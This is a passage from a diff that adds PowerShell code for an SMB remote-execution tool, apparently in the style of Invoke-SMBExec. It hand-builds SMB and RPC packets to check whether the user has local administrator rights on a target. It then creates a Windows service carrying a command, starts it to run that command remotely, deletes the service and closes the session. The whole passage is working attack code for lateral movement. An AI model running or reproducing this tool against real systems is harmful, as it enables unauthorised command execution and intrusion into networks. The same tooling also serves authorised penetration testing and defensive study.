+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'RPCBind'
+ }
+
+ 'RPCBind'
+ {
+ $SMB_FID = $SMB_client_receive[42,43]
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'OpenSCManagerW'
+ }
+
+ 'ReadAndXRequest'
+ {
+ Start-Sleep -m $Sleep
+ $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBReadAndXRequest $SMB_FID
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+
+ 'OpenSCManagerW'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'CheckAccess'
+ }
+
+ 'CheckAccess'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[88..107]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+ {
+ $SMB_service_manager_context_handle = $SMB_client_receive[88..107]
+
+ if($SMB_execute)
+ {
+ Write-Verbose "$output_username is a local administrator on $Target"
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+
+ if($SCM_data.Length -lt $SMB_split_index)
+ {
+ $SMB_client_stage = 'CreateServiceW'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_First'
+ }
+
+ }
+ else
+ {
+ Write-Output "$output_username is a local administrator on $Target"
+ $SMB_close_service_handle_stage = 2
+ $SMB_client_stage = 'CloseServiceHandle'
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00')
+ {
+ Write-Output "$output_username is not a local administrator or does not have required privilege on $Target"
+ $SMBExec_failed = $true
+ }
+ else
+ {
+ Write-Output "Something went wrong with $Target"
+ $SMBExec_failed = $true
+ }
+
+ }
+
+ 'CreateServiceW'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'CreateServiceW_First'
+ {
+ $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
+ $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
+ $SMB_split_index_tracker = $SMB_split_index
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage_final -le 2)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_split_stage = 2
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Middle'
+ {
+ $SMB_split_stage++
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
+ $SMB_split_index_tracker += $SMB_split_index
+ $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage -ge $SMB_split_stage_final)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Last'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x48 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
+ $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'StartServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00')
+ {
+ Write-Verbose "Service $SMB_service created on $Target"
+ $SMB_service_context_handle = $SMB_client_receive[92..111]
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ Write-Verbose "Trying to execute command on $Target"
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'DeleteServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '31-04-00-00')
+ {
+ Write-Output "Service $SMB_service creation failed on $Target"
+ $SMBExec_failed = $true
+ }
+ else
+ {
+ Write-Output "Service creation fault context mismatch"
+ $SMBExec_failed = $true
+ }
+
+ }
+
+ 'DeleteServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '1d-04-00-00')
+ {
+ Write-Output "Command executed with service $SMB_service on $Target"
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '02-00-00-00')
+ {
+ Write-Output "Service $SMB_service failed to start on $Target"
+ }
+
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'CloseServiceHandle'
+ $SMB_close_service_handle_stage = 1
+ }
+
+ 'CloseServiceHandle'
+ {
+ if($SMB_close_service_handle_stage -eq 1)
+ {
+ Write-Verbose "Service $SMB_service deleted on $Target"
+ $SMB_close_service_handle_stage++
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
+ }
+ else
+ {
+ $SMB_client_stage = 'CloseRequest'
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
+ }
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ 'CloseRequest'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBCloseRequest 0x00,0x40
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ 'TreeDisconnect'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBTreeDisconnectRequest
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Logoff'
+ }
+
+ 'Logoff'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBLogoffAndXRequest
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
